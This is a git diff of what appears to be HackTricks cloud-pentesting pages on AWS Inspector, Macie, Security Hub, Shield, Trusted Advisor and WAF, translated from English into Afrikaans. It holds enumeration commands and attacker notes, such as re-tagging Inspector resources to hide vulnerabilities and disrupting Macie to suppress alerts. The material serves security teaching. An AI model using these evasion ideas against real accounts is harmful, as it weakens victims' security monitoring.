 #### `inspector2:TagResource`, `inspector2:UntagResource`
 
-An attacker could manipulate tags on AWS Inspector resources, which are critical for organizing, tracking, and automating security assessments. By altering or removing tags, an attacker could potentially hide vulnerabilities from security scans, disrupt compliance reporting, and interfere with automated remediation processes, leading to unchecked security issues and compromised system integrity.
-
+'n Aanvaller kan etikette op AWS Inspector hulpbronne manipuleer, wat krities is vir die organiseer, opspoor en outomatiseer van sekuriteitsassessering. Deur etikette te verander of te verwyder, kan 'n aanvaller potensieel kwesbaarhede van sekuriteitskande verberg, nakomingsverslaggewing ontwrig, en inmeng met outomatiese herstelprosesse, wat lei tot onbeheerde sekuriteitskwessies en gecompromitteerde stelselintegriteit.
 ```bash
 aws inspector2 tag-resource --resource-arn <value> --tags <value>
 aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>
 ```
+- **Potensiële Impak**: Versteeking van kwesbaarhede, ontwrigting van nakomingsverslagdoening, ontwrigting van sekuriteitsautomatisering en ontwrigting van koste-toewysing.
 
-- **Potential Impact**: Hiding of vulnerabilities, disruption of compliance reporting, disruption of security automation and disruption of cost allocation.
-
-## References
+## Verwysings
 
 - [https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html](https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html)
 - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md
index e6e3a2281..1099dcb0f 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md
@@ -6,70 +6,69 @@
 
 ## Macie
 
-Amazon Macie stands out as a service designed to **automatically detect, classify, and identify data** within an AWS account. It leverages **machine learning** to continuously monitor and analyze data, primarily focusing on detecting and alerting against unusual or suspicious activities by examining **cloud trail event** data and user behavior patterns.
+Amazon Macie val uit as 'n diens wat ontwerp is om **outomaties data te ontdek, te klassifiseer en te identifiseer** binne 'n AWS-rekening. Dit benut **masjienleer** om data deurlopend te monitor en te analiseer, met die primêre fokus op die opsporing en waarskuwing teen ongewone of verdagte aktiwiteite deur **cloud trail event** data en gebruikersgedragspatrone te ondersoek.
 
-Key Features of Amazon Macie:
+Belangrike Kenmerke van Amazon Macie:
 
-1. **Active Data Review**: Employs machine learning to review data actively as various actions occur within the AWS account.
-2. **Anomaly Detection**: Identifies irregular activities or access patterns, generating alerts to mitigate potential data exposure risks.
-3. **Continuous Monitoring**: Automatically monitors and detects new data in Amazon S3, employing machine learning and artificial intelligence to adapt to data access patterns over time.
-4. **Data Classification with NLP**: Utilizes natural language processing (NLP) to classify and interpret different data types, assigning risk scores to prioritize findings.
-5. **Security Monitoring**: Identifies security-sensitive data, including API keys, secret keys, and personal information, helping to prevent data leaks.
+1. **Aktiewe Data-oorsig**: Maak gebruik van masjienleer om data aktief te hersien soos verskeie aksies binne die AWS-rekening plaasvind.
+2. **Anomalie-opsporing**: Identifiseer onreëlmatige aktiwiteite of toegangspatrone, wat waarskuwings genereer om potensiële data blootstellingsrisiko's te verminder.
+3. **Deurlopende Monitering**: Monitor en ontdek outomaties nuwe data in Amazon S3, wat masjienleer en kunsmatige intelligensie benut om aan te pas by data toegangspatrone oor tyd.
+4. **Data Klassifikasie met NLP**: Maak gebruik van natuurlike taalverwerking (NLP) om verskillende datatipes te klassifiseer en te interpreteer, en toekenning van risiko punte om bevindings te prioritiseer.
+5. **Sekuriteitsmonitering**: Identifiseer sekuriteitsgevoelige data, insluitend API-sleutels, geheime sleutels, en persoonlike inligting, wat help om data lekke te voorkom.
 
-Amazon Macie is a **regional service** and requires the 'AWSMacieServiceCustomerSetupRole' IAM Role and an enabled AWS CloudTrail for functionality.
+Amazon Macie is 'n **streekdiens** en vereis die 'AWSMacieServiceCustomerSetupRole' IAM Rol en 'n geaktiveerde AWS CloudTrail vir funksionaliteit.
 
-### Alert System
+### Waarskuwingstelsel
 
-Macie categorizes alerts into predefined categories like:
+Macie kategoriseer waarskuwings in vooraf gedefinieerde kategorieë soos:
 
-- Anonymized access
-- Data compliance
-- Credential Loss
-- Privilege escalation
+- Anonimiseerde toegang
+- Data nakoming
+- Kredensiële verlies
+- Privilege-eskalasie
 - Ransomware
-- Suspicious access, etc.
+- Verdachte toegang, ens.
 
-These alerts provide detailed descriptions and result breakdowns for effective response and resolution.
+Hierdie waarskuwings bied gedetailleerde beskrywings en resultaatopbrekings vir effektiewe reaksie en oplossing.
 
-### Dashboard Features
+### Dashboard Kenmerke
 
-The dashboard categorizes data into various sections, including:
+Die dashboard kategoriseer data in verskeie afdelings, insluitend:
 
-- S3 Objects (by time range, ACL, PII)
-- High-risk CloudTrail events/users
-- Activity Locations
-- CloudTrail user identity types, and more.
+- S3 Voorwerpe (volgens tydsbereik, ACL, PII)
+- Hoë risiko CloudTrail gebeurtenisse/gebruikers
+- Aktiwiteit Lokasies
+- CloudTrail gebruikersidentiteitstipes, en meer.
 
-### User Categorization
+### Gebruiker Kategorisering
 
-Users are classified into tiers based on the risk level of their API calls:
+Gebruikers word geklassifiseer in vlakke gebaseer op die risiko vlak van hul API-oproepe:
 
-- **Platinum**: High-risk API calls, often with admin privileges.
-- **Gold**: Infrastructure-related API calls.
-- **Silver**: Medium-risk API calls.
-- **Bronze**: Low-risk API calls.
+- **Platinum**: Hoë risiko API-oproepe, dikwels met admin regte.
+- **Goud**: Infrastruktuur-verwante API-oproepe.
+- **Silwer**: Medium risiko API-oproepe.
+- **Brons**: Lae risiko API-oproepe.
 
-### Identity Types
+### Identiteitstipes
 
-Identity types include Root, IAM user, Assumed Role, Federated User, AWS Account, and AWS Service, indicating the source of requests.
+Identiteitstipes sluit Root, IAM gebruiker, Aangenome Rol, Gefedereerde Gebruiker, AWS Rekening, en AWS Diens in, wat die bron van versoeke aandui.
 
-### Data Classification
+### Data Klassifikasie
 
-Data classification encompasses:
+Data klassifikasie sluit in:
 
-- Content-Type: Based on detected content type.
-- File Extension: Based on file extension.
-- Theme: Categorized by keywords within files.
-- Regex: Categorized based on specific regex patterns.
+- Inhouds tipe: Gebaseer op die gedetecteerde inhoud tipe.
+- Lêeruitbreiding: Gebaseer op lêeruitbreiding.
+- Tema: Gekategoriseer volgens sleutelwoorde binne lêers.
+- Regex: Gekategoriseer gebaseer op spesifieke regex patrone.
 
-The highest risk among these categories determines the file's final risk level.
+Die hoogste risiko onder hierdie kategorieë bepaal die lêer se finale risiko vlak.
 
-### Research and Analysis
+### Navorsing en Analise
 
-Amazon Macie's research function allows for custom queries across all Macie data for in-depth analysis. Filters include CloudTrail Data, S3 Bucket properties, and S3 Objects. Moreover, it supports inviting other accounts to share Amazon Macie, facilitating collaborative data management and security monitoring.
-
-### Enumeration
+Amazon Macie se navorsingsfunksie laat vir pasgemaakte navrae oor alle Macie data vir diepgaande analise. Filters sluit CloudTrail Data, S3 Emmer eienskappe, en S3 Voorwerpe in. Boonop ondersteun dit die uitnodiging van ander rekeninge om Amazon Macie te deel, wat samewerkende data bestuur en sekuriteitsmonitering fasiliteer.
 
+### Enumerasie
 ```
 # Get buckets
 aws macie2 describe-buckets
@@ -102,21 +101,16 @@ aws macie2 list-classification-jobs
 aws macie2 list-classification-scopes
 aws macie2 list-custom-data-identifiers
 ```
-
 #### Post Exploitation
 
 > [!TIP]
-> From an attackers perspective, this service isn't made to detect the attacker, but to detect sensitive information in the stored files. Therefore, this service might **help an attacker to find sensitive info** inside the buckets.\
-> However, maybe an attacker could also be interested in disrupting it in order to prevent the victim from getting alerts and steal that info easier.
+> Vanuit 'n aanvaller se perspektief is hierdie diens nie gemaak om die aanvaller te ontdek nie, maar om sensitiewe inligting in die gestoor lêers te ontdek. Daarom kan hierdie diens **'n aanvaller help om sensitiewe inligting** binne die emmers te vind.\
+> Dit is egter moontlik dat 'n aanvaller ook geïnteresseerd kan wees om dit te ontwrig om te voorkom dat die slagoffer waarskuwings ontvang en daardie inligting makliker te steel.
 
-TODO: PRs are welcome!
+TODO: PRs is welkom!
 
 ## References
 
 - [https://cloudacademy.com/blog/introducing-aws-security-hub/](https://cloudacademy.com/blog/introducing-aws-security-hub/)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md
index 36dc8fbe9..1e7352495 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md
@@ -4,24 +4,23 @@
 
 ## Security Hub
 
-**Security Hub** collects security **data** from **across AWS accounts**, services, and supported third-party partner products and helps you **analyze your security** trends and identify the highest priority security issues.
+**Security Hub** versamel sekuriteits **data** van **verskeie AWS-rekeninge**, dienste, en ondersteunende derdepartyvennootprodukte en help jou om jou **sekuriteits** tendense te analiseer en die hoogste prioriteit sekuriteitskwessies te identifiseer.
 
-It **centralizes security related alerts across accounts**, and provides a UI for viewing these. The biggest limitation is it **does not centralize alerts across regions**, only across accounts
+Dit **sentraliseer sekuriteitsverwante waarskuwings oor rekeninge**, en bied 'n UI om hierdie te sien. Die grootste beperking is dit **sentraliseer nie waarskuwings oor streke nie**, slegs oor rekeninge.
 
-**Characteristics**
+**Kenmerke**
 
-- Regional (findings don't cross regions)
-- Multi-account support
-- Findings from:
-  - Guard Duty
-  - Config
-  - Inspector
-  - Macie
-  - third party
-  - self-generated against CIS standards
+- Streeks (bevindinge kruis nie streke nie)
+- Multi-rekening ondersteuning
+- Bevindinge van:
+- Guard Duty
+- Config
+- Inspector
+- Macie
+- derdeparty
+- self-gegeneer teen CIS-standaarde
 
 ## Enumeration
-
 ```
 # Get basic info
 aws securityhub describe-hub
@@ -50,18 +49,13 @@ aws securityhub list-automation-rules
 aws securityhub list-members
 aws securityhub get-members --account-ids <acc-id>
 ```
+## Om Ontdekking Te Omseil
 
-## Bypass Detection
+TODO, PRs aanvaar
 
-TODO, PRs accepted
-
-## References
+## Verwysings
 
 - [https://cloudsecdocs.com/aws/services/logging/other/#general-info](https://cloudsecdocs.com/aws/services/logging/other/#general-info)
 - [https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html](https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md
index b1df3003b..0583e0c8b 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md
@@ -4,16 +4,12 @@
 
 ## Shield
 
-AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS.
+AWS Shield is ontwerp om te help **beskerm jou infrastruktuur teen verspreide ontkenning van diens aanvalle**, algemeen bekend as DDoS.
 
-**AWS Shield Standard** is **free** to everyone, and it offers **DDoS protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53.
+**AWS Shield Standard** is **gratis** vir almal, en dit bied **DDoS-beskerming** teen sommige van die meer algemene laag drie, die **netwerklaag**, en laag vier, **vervoerlaag**, DDoS aanvalle. Hierdie beskerming is geïntegreer met beide CloudFront en Route 53.
 
-**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**.
+**AWS Shield advanced** bied 'n **groter vlak van beskerming** vir DDoS aanvalle oor 'n breër reeks AWS dienste teen 'n addisionele koste. Hierdie gevorderde vlak bied beskerming teen jou webtoepassings wat op EC2, CloudFront, ELB en ook Route 53 draai. Benewens hierdie addisionele hulpbronne wat beskerm word, is daar verbeterde vlakke van DDoS-beskerming wat aangebied word in vergelyking met die van Standard. En jy sal ook **toegang hê tot 'n 24-uur spesialiseerde DDoS reaksiespan by AWS, bekend as DRT**.
 
-Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.**
+Terwyl die Standard weergawe van Shield beskerming gebied het teen laag drie en laag vier, **Advanced bied ook beskerming teen laag sewe, toepassing, aanvalle.**
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
index a975d7476..8a0f1e205 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
@@ -4,72 +4,68 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## AWS Trusted Advisor Overview
+## AWS Trusted Advisor Oorsig
 
-Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories:
+Trusted Advisor is 'n diens wat **aanbevelings verskaf** om jou AWS-rekening te optimaliseer, in lyn met **AWS beste praktyke**. Dit is 'n diens wat oor verskeie streke werk. Trusted Advisor bied insigte in vier primêre kategorieë:
 
-1. **Cost Optimization:** Suggests how to restructure resources to reduce expenses.
-2. **Performance:** Identifies potential performance bottlenecks.
-3. **Security:** Scans for vulnerabilities or weak security configurations.
-4. **Fault Tolerance:** Recommends practices to enhance service resilience and fault tolerance.
+1. **Koste-optimalisering:** Stel voor hoe om hulpbronne te herstruktureer om uitgawes te verminder.
+2. **Prestasie:** Identifiseer potensiële prestasie-knelpunte.
+3. **Sekuriteit:** Skandeer vir kwesbaarhede of swak sekuriteitskonfigurasies.
+4. **Fouttoleransie:** Beveel praktyke aan om diensweerstand en fouttoleransie te verbeter.
 
-The comprehensive features of Trusted Advisor are exclusively accessible with **AWS business or enterprise support plans**. Without these plans, access is limited to **six core checks**, primarily focused on performance and security.
+Die omvattende kenmerke van Trusted Advisor is eksklusief beskikbaar met **AWS besigheids- of ondernemingsondersteuningsplanne**. Sonder hierdie planne is toegang beperk tot **ses kernkontroles**, wat hoofsaaklik op prestasie en sekuriteit gefokus is.
 
-### Notifications and Data Refresh
+### Kennisgewings en Data Vernuwing
 
-- Trusted Advisor can issue alerts.
-- Items can be excluded from its checks.
-- Data is refreshed every 24 hours. However, a manual refresh is possible 5 minutes after the last refresh.
+- Trusted Advisor kan waarskuwings uitreik.
+- Items kan uitgesluit word van sy kontroles.
+- Data word elke 24 uur vernuwe. 'n Handmatige vernuwing is egter moontlik 5 minute na die laaste vernuwing.
 
-### **Checks Breakdown**
+### **Kontroles Ontleding**
 
-#### CategoriesCore
+#### Kategoriese Kern
 
-1. Cost Optimization
-2. Security
-3. Fault Tolerance
-4. Performance
-5. Service Limits
-6. S3 Bucket Permissions
+1. Koste-optimalisering
+2. Sekuriteit
+3. Fouttoleransie
+4. Prestasie
+5. Diensgrense
+6. S3 Emmer Toestemmings
 
-#### Core Checks
+#### Kern Kontroles
 
-Limited to users without business or enterprise support plans:
+Beperk tot gebruikers sonder besigheids- of ondernemingsondersteuningsplanne:
 
-1. Security Groups - Specific Ports Unrestricted
-2. IAM Use
-3. MFA on Root Account
-4. EBS Public Snapshots
-5. RDS Public Snapshots
-6. Service Limits
+1. Sekuriteitsgroepe - Spesifieke Poorte Onbeperk
+2. IAM Gebruik
+3. MFA op Wortelrekening
+4. EBS Publieke Snapshot
+5. RDS Publieke Snapshot
+6. Diensgrense
 
-#### Security Checks
+#### Sekuriteitskontroles
 
-A list of checks primarily focusing on identifying and rectifying security threats:
+'n Lys van kontroles wat hoofsaaklik fokus op die identifisering en regstelling van sekuriteitsbedreigings:
 
-- Security group settings for high-risk ports
-- Security group unrestricted access
-- Open write/list access to S3 buckets
-- MFA enabled on root account
-- RDS security group permissiveness
-- CloudTrail usage
-- SPF records for Route 53 MX records
-- HTTPS configuration on ELBs
-- Security groups for ELBs
-- Certificate checks for CloudFront
-- IAM access key rotation (90 days)
-- Exposure of access keys (e.g., on GitHub)
-- Public visibility of EBS or RDS snapshots
-- Weak or absent IAM password policies
+- Sekuriteitsgroepinstellings vir hoë-risiko poorte
+- Sekuriteitsgroep onbeperkte toegang
+- Oop skryf/lis toegang tot S3 emmers
+- MFA geaktiveer op wortelrekening
+- RDS sekuriteitsgroep permissiwiteit
+- CloudTrail gebruik
+- SPF rekords vir Route 53 MX rekords
+- HTTPS konfigurasie op ELBs
+- Sekuriteitsgroepe vir ELBs
+- Sertifikaatkontroles vir CloudFront
+- IAM toegang sleutels rotasie (90 dae)
+- Blootstelling van toegang sleutels (bv. op GitHub)
+- Publieke sigbaarheid van EBS of RDS snapshots
+- Swak of afwesige IAM wagwoordbeleide
 
-AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, performance, security, and fault tolerance of AWS services based on established best practices.
+AWS Trusted Advisor dien as 'n belangrike hulpmiddel om die optimalisering, prestasie, sekuriteit en fouttoleransie van AWS dienste te verseker op grond van gevestigde beste praktyke.
 
-## **References**
+## **Verwysings**
 
 - [https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md
index 661b836d5..bb678b7ca 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md
@@ -6,103 +6,102 @@
 
 ## AWS WAF
 
-AWS WAF is a **web application firewall** designed to **safeguard web applications or APIs** against various web exploits which may impact their availability, security, or resource consumption. It empowers users to control incoming traffic by setting up **security rules** that mitigate typical attack vectors like SQL injection or cross-site scripting and also by defining custom filtering rules.
+AWS WAF is 'n **webtoepassing vuurmuur** wat ontwerp is om **webtoepassings of API's** te beskerm teen verskeie webaanvalle wat hul beskikbaarheid, sekuriteit of hulpbronverbruik kan beïnvloed. Dit stel gebruikers in staat om inkomende verkeer te beheer deur **sekuriteitsreëls** op te stel wat tipiese aanvalsvektore soos SQL-inspuiting of kruis-webskripting verminder en ook deur pasgemaakte filtrasie-reëls te definieer.
 
-### Key concepts
+### Sleutelkonsepte
 
-#### Web ACL (Access Control List)
+#### Web ACL (Toegang Beheerlys)
 
-A Web ACL is a collection of rules that you can apply to your web applications or APIs. When you associate a Web ACL with a resource, AWS WAF inspects incoming requests based on the rules defined in the Web ACL and takes the specified actions.
+'n Web ACL is 'n versameling van reëls wat jy op jou webtoepassings of API's kan toepas. Wanneer jy 'n Web ACL met 'n hulpbron assosieer, ondersoek AWS WAF inkomende versoeke gebaseer op die reëls wat in die Web ACL gedefinieer is en neem die gespesifiseerde aksies.
 
-#### Rule Group
+#### Reëlgroep
 
-A Rule Group is a reusable collection of rules that you can apply to multiple Web ACLs. Rule groups help manage and maintain consistent rule sets across different web applications or APIs.
+'n Reëlgroep is 'n herbruikbare versameling van reëls wat jy op verskeie Web ACL's kan toepas. Reëlgroepe help om konsekwente reëlstelle oor verskillende webtoepassings of API's te bestuur en te onderhou.
 
-Each rule group has its associated **capacity**, which helps to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. Once its value is set during creation, it is not possible to modify it.
+Elke reëlgroep het sy geassosieerde **kapasiteit**, wat help om die bedryfsbronne wat gebruik word om jou reëls, reëlgroepe en web ACL's te bestuur, te bereken en te beheer. Sodra die waarde tydens die skepping gestel is, is dit nie moontlik om dit te wysig nie.
 
-#### Rule
+#### Reël
 
-A rule defines a set of conditions that AWS WAF uses to inspect incoming web requests. There are two main types of rules:
+'n Reël definieer 'n stel voorwaardes wat AWS WAF gebruik om inkomende webversoeke te ondersoek. Daar is twee hoofsoorte reëls:
 
-1. **Regular Rule**: This rule type uses specified conditions to determine whether to allow, block, or count web requests.
-2. **Rate-Based Rule**: Counts requests from a specific IP address over a five-minute period. Here, users define a threshold, and if the number of requests from an IP exceeds this limit within five minutes, subsequent requests from that IP are blocked until the request rate drops below the threshold. The minimum threshold for rate-based rules is **2000 requests**.
+1. **Reguliere Reël**: Hierdie reël tipe gebruik gespesifiseerde voorwaardes om te bepaal of webversoeke toegelaat, geblokkeer of getel moet word.
+2. **Tarief-gebaseerde Reël**: Tel versoeke van 'n spesifieke IP-adres oor 'n vyf-minuut periode. Hier definieer gebruikers 'n drempel, en as die aantal versoeke van 'n IP hierdie limiet binne vyf minute oorskry, word daaropvolgende versoeke van daardie IP geblokkeer totdat die versoektarief onder die drempel daal. Die minimum drempel vir tarief-gebaseerde reëls is **2000 versoeke**.
 
-#### Managed Rules
+#### Geverifieerde Reëls
 
-AWS WAF offers pre-configured, managed rule sets that are maintained by AWS and AWS Marketplace sellers. These rule sets provide protection against common threats and are regularly updated to address new vulnerabilities.
+AWS WAF bied vooraf-gekonfigureerde, geverifieerde reëlstelle wat deur AWS en AWS Marketplace verkopers onderhou word. Hierdie reëlstelle bied beskerming teen algemene bedreigings en word gereeld opgedateer om nuwe kwesbaarhede aan te spreek.
 
-#### IP Set
+#### IP Stel
 
-An IP Set is a list of IP addresses or IP address ranges that you want to allow or block. IP sets simplify the process of managing IP-based rules.
+'n IP Stel is 'n lys van IP-adresse of IP-adresreekse wat jy wil toelaat of blokkeer. IP stelle vereenvoudig die proses om IP-gebaseerde reëls te bestuur.
 
-#### Regex Pattern Set
+#### Regex Patroon Stel
 
-A Regex Pattern Set contains one or more regular expressions (regex) that define patterns to search for in web requests. This is useful for more complex matching scenarios, such as filtering specific sequences of characters.
+'n Regex Patroon Stel bevat een of meer regulêre uitdrukkings (regex) wat patrone definieer om in webversoeke te soek. Dit is nuttig vir meer komplekse ooreenkoms scenario's, soos om spesifieke volgordes van karakters te filtreer.
 
 #### Lock Token
 
-A Lock Token is used for concurrency control when making updates to WAF resources. It ensures that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously.
+'n Lock Token word gebruik vir gelyktydigheidsbeheer wanneer opdaterings aan WAF-hulpbronne gemaak word. Dit verseker dat veranderinge nie per ongeluk deur verskeie gebruikers of prosesse wat probeer om dieselfde hulpbron gelyktydig op te dateer, oorgeskryf word nie.
 
-#### API Keys
+#### API Sleutels
 
-API Keys in AWS WAF are used to authenticate requests to certain API operations. These keys are encrypted and managed securely to control access and ensure that only authorized users can make changes to WAF configurations.
+API Sleutels in AWS WAF word gebruik om versoeke na sekere API operasies te verifieer. Hierdie sleutels is versleuteld en veilig bestuur om toegang te beheer en te verseker dat slegs gemagtigde gebruikers veranderinge aan WAF-konfigurasies kan maak.
 
-- **Example**: Integration of the CAPTCHA API.
+- **Voorbeeld**: Integrasie van die CAPTCHA API.
 
-#### Permission Policy
+#### Toestemming Beleid
 
-A Permission Policy is an IAM policy that specifies who can perform actions on AWS WAF resources. By defining permissions, you can control access to WAF resources and ensure that only authorized users can create, update, or delete configurations.
+'n Toestemming Beleid is 'n IAM beleid wat spesifiseer wie aksies op AWS WAF-hulpbronne kan uitvoer. Deur toestemmings te definieer, kan jy toegang tot WAF-hulpbronne beheer en verseker dat slegs gemagtigde gebruikers konfigurasies kan skep, opdateer of verwyder.
 
-#### Scope
+#### Bereik
 
-The scope parameter in AWS WAF specifies whether the WAF rules and configurations apply to a regional application or an Amazon CloudFront distribution.
+Die bereikparameter in AWS WAF spesifiseer of die WAF-reëls en konfigurasies van toepassing is op 'n streeks toepassing of 'n Amazon CloudFront verspreiding.
 
-- **REGIONAL**: Applies to regional services such as Application Load Balancers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito user pool, AWS App Runner service and AWS Verified Access instance. You specify the AWS region where these resources are located.
-- **CLOUDFRONT**: Applies to Amazon CloudFront distributions, which are global. WAF configurations for CloudFront are managed through the `us-east-1` region regardless of where the content is served.
+- **REGIONAL**: Geld vir streeks dienste soos Toepassing Laai Balansers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito gebruikerspoel, AWS App Runner diens en AWS Verified Access instansie. Jy spesifiseer die AWS streek waar hierdie hulpbronne geleë is.
+- **CLOUDFRONT**: Geld vir Amazon CloudFront verspreidings, wat globaal is. WAF-konfigurasies vir CloudFront word deur die `us-east-1` streek bestuur ongeag waar die inhoud bedien word.
 
-### Key features
+### Sleutelkenmerke
 
-#### Monitoring Criteria (Conditions)
+#### Monitering Kriteria (Voorwaardes)
 
-**Conditions** specify the elements of incoming HTTP/HTTPS requests that AWS WAF monitors, which include XSS, geographical location (GEO), IP addresses, Size constraints, SQL Injection, and patterns (strings and regex matching). It's important to note that **requests restricted at the CloudFront level based on country won't reach WAF**.
+**Voorwaardes** spesifiseer die elemente van inkomende HTTP/HTTPS versoeke wat AWS WAF monitor, wat XSS, geografiese ligging (GEO), IP-adresse, Grootte beperkings, SQL-inspuiting, en patrone (stringe en regex ooreenkomste) insluit. Dit is belangrik om te noem dat **versoeke wat op die CloudFront vlak op grond van land beperk is, nie WAF sal bereik nie**.
 
-Each AWS account can configure:
+Elke AWS rekening kan konfigureer:
 
-- **100 conditions** for each type (except for Regex, where only **10 conditions** are allowed, but this limit can be increased).
-- **100 rules** and **50 Web ACLs**.
-- A maximum of **5 rate-based rules**.
-- A throughput of **10,000 requests per second** when WAF is implemented with an application load balancer.
+- **100 voorwaardes** vir elke tipe (behalwe vir Regex, waar slegs **10 voorwaardes** toegelaat word, maar hierdie limiet kan verhoog word).
+- **100 reëls** en **50 Web ACLs**.
+- 'n maksimum van **5 tarief-gebaseerde reëls**.
+- 'n deurset van **10,000 versoeke per sekonde** wanneer WAF geïmplementeer word met 'n toepassing laai balancer.
 
-#### Rule actions
+#### Reël aksies
 
-Actions are assigned to each rule, with options being:
+Aksies word aan elke reël toegeken, met opsies soos:
 
-- **Allow**: The request is forwarded to the appropriate CloudFront distribution or Application Load Balancer.
-- **Block**: The request is terminated immediately.
-- **Count**: Tallies the requests meeting the rule's conditions. This is useful for rule testing, confirming the rule's accuracy before setting it to Allow or Block.
-- **CAPTCHA and Challenge:** It is verified that the request does not come from a bot using CAPTCHA puzzles and silent challenges.
+- **Toelaat**: Die versoek word na die toepaslike CloudFront verspreiding of Toepassing Laai Balanser gestuur.
+- **Blokkeer**: Die versoek word onmiddellik beëindig.
+- **Tel**: Tel die versoeke wat aan die reël se voorwaardes voldoen. Dit is nuttig vir reëltoetsing, om die akkuraatheid van die reël te bevestig voordat dit op Toelaat of Blokkeer gestel word.
+- **CAPTCHA en Uitdaging:** Dit word geverifieer dat die versoek nie van 'n bot kom nie deur CAPTCHA legkaarte en stille uitdagings.
 
-If a request doesn't match any rule within the Web ACL, it undergoes the **default action** (Allow or Block). The order of rule execution, defined within a Web ACL, is crucial and typically follows this sequence:
+As 'n versoek nie aan enige reël binne die Web ACL voldoen nie, ondergaan dit die **standaard aksie** (Toelaat of Blokkeer). Die volgorde van reël uitvoering, wat binne 'n Web ACL gedefinieer is, is belangrik en volg tipies hierdie volgorde:
 
-1. Allow Whitelisted IPs.
-2. Block Blacklisted IPs.
-3. Block requests matching any detrimental signatures.
+1. Toelaat Witlys IP's.
+2. Blokkeer Swartlys IP's.
+3. Blokkeer versoeke wat enige nadelige handtekeninge ooreenstem.
 
-#### CloudWatch Integration
+#### CloudWatch Integrasie
 
-AWS WAF integrates with CloudWatch for monitoring, offering metrics like AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests. These metrics are reported every minute by default and retained for a period of two weeks.
+AWS WAF integreer met CloudWatch vir monitering, wat metrieke soos AllowedRequests, BlockedRequests, CountedRequests, en PassedRequests bied. Hierdie metrieke word elke minuut standaard gerapporteer en vir 'n periode van twee weke behou.
 
-### Enumeration
+### Enumerasie
 
-In order to interact with CloudFront distributions, you must specify the Region US East (N. Virginia):
+Om met CloudFront verspreidings te kommunikeer, moet jy die Streek US East (N. Virginia) spesifiseer:
 
-- CLI - Specify the Region US East when you use the CloudFront scope: `--scope CLOUDFRONT --region=us-east-1` .
-- API and SDKs - For all calls, use the Region endpoint us-east-1.
+- CLI - Spesifiseer die Streek US East wanneer jy die CloudFront bereik gebruik: `--scope CLOUDFRONT --region=us-east-1`.
+- API en SDK's - Vir alle oproepe, gebruik die Streek eindpunt us-east-1.
 
-In order to interact with regional services, you should specify the region:
-
-- Example with the region Europe (Spain): `--scope REGIONAL --region=eu-south-2`
+Om met streeks dienste te kommunikeer, moet jy die streek spesifiseer:
 
+- Voorbeeld met die streek Europa (Spanje): `--scope REGIONAL --region=eu-south-2`
 ```bash
 # Web ACLs #
 
@@ -146,7 +145,7 @@ aws wafv2 list-ip-sets --scope <REGIONAL --region=<value> | CLOUDFRONT --region=
